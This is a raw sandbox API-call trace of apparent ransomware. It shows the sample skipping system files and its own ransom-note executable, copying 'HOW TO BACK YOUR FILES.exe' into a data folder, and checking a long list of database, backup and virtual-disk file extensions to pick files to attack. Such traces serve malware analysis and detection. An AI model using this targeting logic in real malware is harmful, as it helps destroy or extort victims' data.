ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x36f738e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36f738e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0085.441] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.441] lstrcmpiW (lpString1="Temp", lpString2="aoldtz.exe") returned 1 [0085.441] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0085.441] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0085.441] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0085.441] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0085.441] lstrcmpiW (lpString1="Temp", lpString2="temp") returned 0 [0085.441] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x36f738e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36f738e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0085.441] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0085.441] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a90 [0085.441] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\RAC\\StateData", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\RAC\\StateData") returned="C:\\Users\\All Users\\Microsoft\\RAC\\StateData" [0085.441] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df950 | out: hHeap=0x2b0000) returned 1 [0085.441] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0085.441] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\RAC\\StateData") returned 42 [0085.441] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\RAC\\StateData" | out: lpString1="C:\\Users\\All Users\\Microsoft\\RAC\\StateData") returned="C:\\Users\\All Users\\Microsoft\\RAC\\StateData" [0085.441] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0085.441] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0085.442] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0085.442] GetLastError () returned 0x0 [0085.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0085.442] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0085.442] CloseHandle (hObject=0x120) returned 1 [0085.442] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0085.442] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0085.442] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0085.442] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.442] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0085.442] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.442] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.442] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.442] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0085.442] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.442] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.442] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c577380, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0085.442] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0085.442] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb35800, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xecb35800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xbddb7d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacDatabase.sdf", cAlternateFileName="RACDAT~1.SDF")) returned 1 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="aoldtz.exe") returned 1 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2=".") returned 1 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="..") returned 1 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="windows") returned -1 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="bootmgr") returned 1 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="temp") returned -1 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="pagefile.sys") returned 1 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="boot") returned 1 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="ids.txt") returned 1 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="ntuser.dat") returned 1 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="perflogs") returned 1 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="MSBuild") returned 1 [0085.443] lstrlenW (lpString="RacDatabase.sdf") returned 15 [0085.443] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*") returned 44 [0085.443] lstrcpyW (in: lpString1=0x2cce456, lpString2="RacDatabase.sdf" | out: lpString1="RacDatabase.sdf") returned="RacDatabase.sdf" [0085.443] lstrlenW (lpString="RacDatabase.sdf") returned 15 [0085.443] lstrlenW (lpString="Ares865") returned 7 [0085.443] lstrcmpiW (lpString1="ase.sdf", lpString2="Ares865") returned 1 [0085.443] lstrlenW (lpString=".dll") returned 4 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2=".dll") returned 1 [0085.443] lstrlenW (lpString=".lnk") returned 4 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2=".lnk") returned 1 [0085.443] lstrlenW (lpString=".ini") returned 4 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2=".ini") returned 1 [0085.443] lstrlenW (lpString=".sys") returned 4 [0085.443] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2=".sys") returned 1 [0085.443] lstrlenW (lpString="RacDatabase.sdf") returned 15 [0085.443] lstrlenW (lpString="bak") returned 3 [0085.443] lstrcmpiW (lpString1="sdf", lpString2="bak") returned 1 [0085.443] lstrlenW (lpString="ba_") returned 3 [0085.443] lstrcmpiW (lpString1="sdf", lpString2="ba_") returned 1 [0085.443] lstrlenW (lpString="dbb") returned 3 [0085.443] lstrcmpiW (lpString1="sdf", lpString2="dbb") returned 1 [0085.443] lstrlenW (lpString="vmdk") returned 4 [0085.443] lstrcmpiW (lpString1=".sdf", lpString2="vmdk") returned -1 [0085.443] lstrlenW (lpString="rar") returned 3 [0085.443] lstrcmpiW (lpString1="sdf", lpString2="rar") returned 1 [0085.444] lstrlenW (lpString="zip") returned 3 [0085.444] lstrcmpiW (lpString1="sdf", lpString2="zip") returned -1 [0085.444] lstrlenW (lpString="tgz") returned 3 [0085.444] lstrcmpiW (lpString1="sdf", lpString2="tgz") returned -1 [0085.444] lstrlenW (lpString="vbox") returned 4 [0085.444] lstrcmpiW (lpString1=".sdf", lpString2="vbox") returned -1 [0085.444] lstrlenW (lpString="vdi") returned 3 [0085.444] lstrcmpiW (lpString1="sdf", lpString2="vdi") returned -1 [0085.444] lstrlenW (lpString="vhd") returned 3 [0085.444] lstrcmpiW (lpString1="sdf", lpString2="vhd") returned -1 [0085.444] lstrlenW (lpString="vhdx") returned 4 [0085.444] lstrcmpiW (lpString1=".sdf", lpString2="vhdx") returned -1 [0085.444] lstrlenW (lpString="avhd") returned 4 [0085.444] lstrcmpiW (lpString1=".sdf", lpString2="avhd") returned -1 [0085.444] lstrlenW (lpString="db") returned 2 [0085.444] lstrcmpiW (lpString1="df", lpString2="db") returned 1 [0085.444] lstrlenW (lpString="db2") returned 3 [0085.444] lstrcmpiW (lpString1="sdf", lpString2="db2") returned 1 [0085.444] lstrlenW (lpString="db3") returned 3 [0085.444] lstrcmpiW (lpString1="sdf", lpString2="db3") returned 1 [0085.444] lstrlenW (lpString="dbf") returned 3 [0085.444] lstrcmpiW (lpString1="sdf", lpString2="dbf") returned 1 [0085.444] lstrlenW (lpString="mdf") returned 3 [0085.444] lstrcmpiW (lpString1="sdf", lpString2="mdf") returned 1 [0085.444] lstrlenW (lpString="mdb") returned 3 [0085.444] lstrcmpiW (lpString1="sdf", lpString2="mdb") returned 1 [0085.444] lstrlenW (lpString="sql") returned 3 [0085.444] lstrcmpiW (lpString1="sdf", lpString2="sql") returned -1 [0085.444] lstrlenW (lpString="sqlite") returned 6 [0085.444] lstrcmpiW (lpString1="se.sdf", lpString2="sqlite") returned -1 [0085.444] lstrlenW (lpString="sqlite3") returned 7 [0085.444] lstrcmpiW (lpString1="ase.sdf", lpString2="sqlite3") returned -1 [0085.444] lstrlenW (lpString="sqlitedb") returned 8 [0085.444] lstrcmpiW (lpString1="base.sdf", lpString2="sqlitedb") returned -1 [0085.444] lstrlenW (lpString="xml") returned 3 [0085.444] lstrcmpiW (lpString1="sdf", lpString2="xml") returned -1 [0085.444] lstrlenW (lpString="$er") returned 3 [0085.444] lstrcmpiW (lpString1="sdf", lpString2="$er") returned 1 [0085.445] lstrlenW (lpString="4dd") returned 3 [0085.445] lstrcmpiW (lpString1="sdf", lpString2="4dd") returned 1 [0085.445] lstrlenW (lpString="4dl") returned 3 [0085.445] lstrcmpiW (lpString1="sdf", lpString2="4dl") returned 1 [0085.445] lstrlenW (lpString="^^^") returned 3 [0085.445] lstrcmpiW (lpString1="sdf", lpString2="^^^") returned 1 [0085.445] lstrlenW (lpString="abs") returned 3 [0085.445] lstrcmpiW (lpString1="sdf", lpString2="abs") returned 1 [0085.445] lstrlenW (lpString="abx") returned 3 [0085.445] lstrcmpiW (lpString1="sdf", lpString2="abx") returned 1 [0085.445] lstrlenW (lpString="accdb") returned 5 [0085.445] lstrcmpiW (lpString1="e.sdf", lpString2="accdb") returned 1 [0085.445] lstrlenW (lpString="accdc") returned 5 [0085.445] lstrcmpiW (lpString1="e.sdf", lpString2="accdc") returned 1 [0085.445] lstrlenW (lpString="accde") returned 5 [0085.445] lstrcmpiW (lpString1="e.sdf", lpString2="accde") returned 1 [0085.445] lstrlenW (lpString="accdr") returned 5 [0085.445] lstrcmpiW (lpString1="e.sdf", lpString2="accdr") returned 1 [0085.445] lstrlenW (lpString="accdt") returned 5 [0085.445] lstrcmpiW (lpString1="e.sdf", lpString2="accdt") returned 1 [0085.445] lstrlenW (lpString="accdw") returned 5 [0085.445] lstrcmpiW (lpString1="e.sdf", lpString2="accdw") returned 1 [0085.445] lstrlenW (lpString="accft") returned 5 [0085.445] lstrcmpiW (lpString1="e.sdf", lpString2="accft") returned 1 [0085.445] lstrlenW (lpString="adb") returned 3 [0085.445] lstrcmpiW (lpString1="sdf", lpString2="adb") returned 1 [0085.445] lstrlenW (lpString="adb") returned 3 [0085.445] lstrcmpiW (lpString1="sdf", lpString2="adb") returned 1 [0085.445] lstrlenW (lpString="ade") returned 3 [0085.445] lstrcmpiW (lpString1="sdf", lpString2="ade") returned 1 [0085.445] lstrlenW (lpString="adf") returned 3 [0085.445] lstrcmpiW (lpString1="sdf", lpString2="adf") returned 1 [0085.445] lstrlenW (lpString="adn") returned 3 [0085.445] lstrcmpiW (lpString1="sdf", lpString2="adn") returned 1 [0085.445] lstrlenW (lpString="adp") returned 3 [0085.445] lstrcmpiW (lpString1="sdf", lpString2="adp") returned 1 [0085.445] lstrlenW (lpString="alf") returned 3 [0085.445] lstrcmpiW (lpString1="sdf", lpString2="alf") returned 1 [0085.446] lstrlenW (lpString="ask") returned 3 [0085.446] lstrcmpiW (lpString1="sdf", lpString2="ask") returned 1 [0085.446] lstrlenW (lpString="btr") returned 3 [0085.446] lstrcmpiW (lpString1="sdf", lpString2="btr") returned 1 [0085.446] lstrlenW (lpString="cat") returned 3 [0085.446] lstrcmpiW (lpString1="sdf", lpString2="cat") returned 1 [0085.446] lstrlenW (lpString="cdb") returned 3 [0085.446] lstrcmpiW (lpString1="sdf", lpString2="cdb") returned 1 [0085.446] lstrlenW (lpString="ckp") returned 3 [0085.446] lstrcmpiW (lpString1="sdf", lpString2="ckp") returned 1 [0085.446] lstrlenW (lpString="cma") returned 3 [0085.446] lstrcmpiW (lpString1="sdf", lpString2="cma") returned 1 [0085.446] lstrlenW (lpString="cpd") returned 3 [0085.446] lstrcmpiW (lpString1="sdf", lpString2="cpd") returned 1 [0085.446] lstrlenW (lpString="dacpac") returned 6 [0085.446] lstrcmpiW (lpString1="se.sdf", lpString2="dacpac") returned 1 [0085.446] lstrlenW (lpString="dad") returned 3 [0085.446] lstrcmpiW (lpString1="sdf", lpString2="dad") returned 1 [0085.446] lstrlenW (lpString="dadiagrams") returned 10 [0085.446] lstrcmpiW (lpString1="tabase.sdf", lpString2="dadiagrams") returned 1 [0085.446] lstrlenW (lpString="daschema") returned 8 [0085.446] lstrcmpiW (lpString1="base.sdf", lpString2="daschema") returned -1 [0085.446] lstrlenW (lpString="db-journal") returned 10 [0085.446] lstrcmpiW (lpString1="tabase.sdf", lpString2="db-journal") returned 1 [0085.446] lstrlenW (lpString="db-shm") returned 6 [0085.446] lstrcmpiW (lpString1="se.sdf", lpString2="db-shm") returned 1 [0085.446] lstrlenW (lpString="db-wal") returned 6 [0085.446] lstrcmpiW (lpString1="se.sdf", lpString2="db-wal") returned 1 [0085.446] lstrlenW (lpString="dbc") returned 3 [0085.446] lstrcmpiW (lpString1="sdf", lpString2="dbc") returned 1 [0085.446] lstrlenW (lpString="dbs") returned 3 [0085.446] lstrcmpiW (lpString1="sdf", lpString2="dbs") returned 1 [0085.446] lstrlenW (lpString="dbt") returned 3 [0085.446] lstrcmpiW (lpString1="sdf", lpString2="dbt") returned 1 [0085.446] lstrlenW (lpString="dbv") returned 3 [0085.446] lstrcmpiW (lpString1="sdf", lpString2="dbv") returned 1 [0085.446] lstrlenW (lpString="dbx") returned 3 [0085.446] lstrcmpiW (lpString1="sdf", lpString2="dbx") returned 1 [0085.446] lstrlenW (lpString="dcb") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="dcb") returned 1 [0085.447] lstrlenW (lpString="dct") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="dct") returned 1 [0085.447] lstrlenW (lpString="dcx") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="dcx") returned 1 [0085.447] lstrlenW (lpString="ddl") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="ddl") returned 1 [0085.447] lstrlenW (lpString="dlis") returned 4 [0085.447] lstrcmpiW (lpString1=".sdf", lpString2="dlis") returned -1 [0085.447] lstrlenW (lpString="dp1") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="dp1") returned 1 [0085.447] lstrlenW (lpString="dqy") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="dqy") returned 1 [0085.447] lstrlenW (lpString="dsk") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="dsk") returned 1 [0085.447] lstrlenW (lpString="dsn") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="dsn") returned 1 [0085.447] lstrlenW (lpString="dtsx") returned 4 [0085.447] lstrcmpiW (lpString1=".sdf", lpString2="dtsx") returned -1 [0085.447] lstrlenW (lpString="dxl") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="dxl") returned 1 [0085.447] lstrlenW (lpString="eco") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="eco") returned 1 [0085.447] lstrlenW (lpString="ecx") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="ecx") returned 1 [0085.447] lstrlenW (lpString="edb") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="edb") returned 1 [0085.447] lstrlenW (lpString="epim") returned 4 [0085.447] lstrcmpiW (lpString1=".sdf", lpString2="epim") returned -1 [0085.447] lstrlenW (lpString="fcd") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="fcd") returned 1 [0085.447] lstrlenW (lpString="fdb") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="fdb") returned 1 [0085.447] lstrlenW (lpString="fic") returned 3 [0085.447] lstrcmpiW (lpString1="sdf", lpString2="fic") returned 1 [0085.447] lstrlenW (lpString="flexolibrary") returned 12 [0085.447] lstrcmpiW (lpString1="Database.sdf", lpString2="flexolibrary") returned -1 [0085.447] lstrlenW (lpString="fm5") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="fm5") returned 1 [0085.448] lstrlenW (lpString="fmp") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="fmp") returned 1 [0085.448] lstrlenW (lpString="fmp12") returned 5 [0085.448] lstrcmpiW (lpString1="e.sdf", lpString2="fmp12") returned -1 [0085.448] lstrlenW (lpString="fmpsl") returned 5 [0085.448] lstrcmpiW (lpString1="e.sdf", lpString2="fmpsl") returned -1 [0085.448] lstrlenW (lpString="fol") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="fol") returned 1 [0085.448] lstrlenW (lpString="fp3") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="fp3") returned 1 [0085.448] lstrlenW (lpString="fp4") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="fp4") returned 1 [0085.448] lstrlenW (lpString="fp5") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="fp5") returned 1 [0085.448] lstrlenW (lpString="fp7") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="fp7") returned 1 [0085.448] lstrlenW (lpString="fpt") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="fpt") returned 1 [0085.448] lstrlenW (lpString="frm") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="frm") returned 1 [0085.448] lstrlenW (lpString="gdb") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="gdb") returned 1 [0085.448] lstrlenW (lpString="gdb") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="gdb") returned 1 [0085.448] lstrlenW (lpString="grdb") returned 4 [0085.448] lstrcmpiW (lpString1=".sdf", lpString2="grdb") returned -1 [0085.448] lstrlenW (lpString="gwi") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="gwi") returned 1 [0085.448] lstrlenW (lpString="hdb") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="hdb") returned 1 [0085.448] lstrlenW (lpString="his") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="his") returned 1 [0085.448] lstrlenW (lpString="ib") returned 2 [0085.448] lstrcmpiW (lpString1="df", lpString2="ib") returned -1 [0085.448] lstrlenW (lpString="idb") returned 3 [0085.448] lstrcmpiW (lpString1="sdf", lpString2="idb") returned 1 [0085.448] lstrlenW (lpString="ihx") returned 3 [0085.449] lstrcmpiW (lpString1="sdf", lpString2="ihx") returned 1 [0085.449] lstrlenW (lpString="itdb") returned 4 [0085.449] lstrcmpiW (lpString1=".sdf", lpString2="itdb") returned -1 [0085.449] lstrlenW (lpString="itw") returned 3 [0085.449] lstrcmpiW (lpString1="sdf", lpString2="itw") returned 1 [0085.449] lstrlenW (lpString="jet") returned 3 [0085.449] lstrcmpiW (lpString1="sdf", lpString2="jet") returned 1 [0085.449] lstrlenW (lpString="jtx") returned 3 [0085.449] lstrcmpiW (lpString1="sdf", lpString2="jtx") returned 1 [0085.449] lstrlenW (lpString="kdb") returned 3 [0085.449] lstrcmpiW (lpString1="sdf", lpString2="kdb") returned 1 [0085.449] lstrlenW (lpString="kexi") returned 4 [0085.449] lstrcmpiW (lpString1=".sdf", lpString2="kexi") returned -1 [0085.449] lstrlenW (lpString="kexic") returned 5 [0085.449] lstrcmpiW (lpString1="e.sdf", lpString2="kexic") returned -1 [0085.449] lstrlenW (lpString="kexis") returned 5 [0085.449] lstrcmpiW (lpString1="e.sdf", lpString2="kexis") returned -1 [0085.449] lstrlenW (lpString="lgc") returned 3 [0085.449] lstrcmpiW (lpString1="sdf", lpString2="lgc") returned 1 [0085.449] lstrlenW (lpString="lwx") returned 3 [0085.449] lstrcmpiW (lpString1="sdf", lpString2="lwx") returned 1 [0085.449] lstrlenW (lpString="maf") returned 3 [0085.449] lstrcmpiW (lpString1="sdf", lpString2="maf") returned 1 [0085.449] lstrlenW (lpString="maq") returned 3 [0085.449] lstrcmpiW (lpString1="sdf", lpString2="maq") returned 1 [0085.449] lstrlenW (lpString="mar") returned 3 [0085.449] lstrcmpiW (lpString1="sdf", lpString2="mar") returned 1 [0085.449] lstrlenW (lpString="marshal") returned 7 [0085.449] lstrcmpiW (lpString1="ase.sdf", lpString2="marshal") returned -1 [0085.449] lstrlenW (lpString="mas") returned 3 [0085.449] lstrcmpiW (lpString1="sdf", lpString2="mas") returned 1 [0085.449] lstrlenW (lpString="mav") returned 3 [0085.449] lstrcmpiW (lpString1="sdf", lpString2="mav") returned 1 [0085.449] lstrlenW (lpString="maw") returned 3 [0085.449] lstrcmpiW (lpString1="sdf", lpString2="maw") returned 1 [0085.449] lstrlenW (lpString="mdbhtml") returned 7 [0085.449] lstrcmpiW (lpString1="ase.sdf", lpString2="mdbhtml") returned -1 [0085.449] lstrlenW (lpString="mdn") returned 3 [0085.449] lstrcmpiW (lpString1="sdf", lpString2="mdn") returned 1 [0085.450] lstrlenW (lpString="mdt") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="mdt") returned 1 [0085.450] lstrlenW (lpString="mfd") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="mfd") returned 1 [0085.450] lstrlenW (lpString="mpd") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="mpd") returned 1 [0085.450] lstrlenW (lpString="mrg") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="mrg") returned 1 [0085.450] lstrlenW (lpString="mud") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="mud") returned 1 [0085.450] lstrlenW (lpString="mwb") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="mwb") returned 1 [0085.450] lstrlenW (lpString="myd") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="myd") returned 1 [0085.450] lstrlenW (lpString="ndf") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="ndf") returned 1 [0085.450] lstrlenW (lpString="nnt") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="nnt") returned 1 [0085.450] lstrlenW (lpString="nrmlib") returned 6 [0085.450] lstrcmpiW (lpString1="se.sdf", lpString2="nrmlib") returned 1 [0085.450] lstrlenW (lpString="ns2") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="ns2") returned 1 [0085.450] lstrlenW (lpString="ns3") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="ns3") returned 1 [0085.450] lstrlenW (lpString="ns4") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="ns4") returned 1 [0085.450] lstrlenW (lpString="nsf") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="nsf") returned 1 [0085.450] lstrlenW (lpString="nv") returned 2 [0085.450] lstrcmpiW (lpString1="df", lpString2="nv") returned -1 [0085.450] lstrlenW (lpString="nv2") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="nv2") returned 1 [0085.450] lstrlenW (lpString="nwdb") returned 4 [0085.450] lstrcmpiW (lpString1=".sdf", lpString2="nwdb") returned -1 [0085.450] lstrlenW (lpString="nyf") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="nyf") returned 1 [0085.450] lstrlenW (lpString="odb") returned 3 [0085.450] lstrcmpiW (lpString1="sdf", lpString2="odb") returned 1 [0085.451] lstrlenW (lpString="odb") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="odb") returned 1 [0085.451] lstrlenW (lpString="oqy") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="oqy") returned 1 [0085.451] lstrlenW (lpString="ora") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="ora") returned 1 [0085.451] lstrlenW (lpString="orx") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="orx") returned 1 [0085.451] lstrlenW (lpString="owc") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="owc") returned 1 [0085.451] lstrlenW (lpString="p96") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="p96") returned 1 [0085.451] lstrlenW (lpString="p97") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="p97") returned 1 [0085.451] lstrlenW (lpString="pan") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="pan") returned 1 [0085.451] lstrlenW (lpString="pdb") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="pdb") returned 1 [0085.451] lstrlenW (lpString="pdm") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="pdm") returned 1 [0085.451] lstrlenW (lpString="pnz") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="pnz") returned 1 [0085.451] lstrlenW (lpString="qry") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="qry") returned 1 [0085.451] lstrlenW (lpString="qvd") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="qvd") returned 1 [0085.451] lstrlenW (lpString="rbf") returned 3 [0085.451] lstrcmpiW (lpString1="sdf", lpString2="rbf") returned 1 [0085.451] lstrlenW (lpString="rctd") returned 4 [0085.451] lstrcmpiW (lpString1=".sdf", lpString2="rctd") returned -1 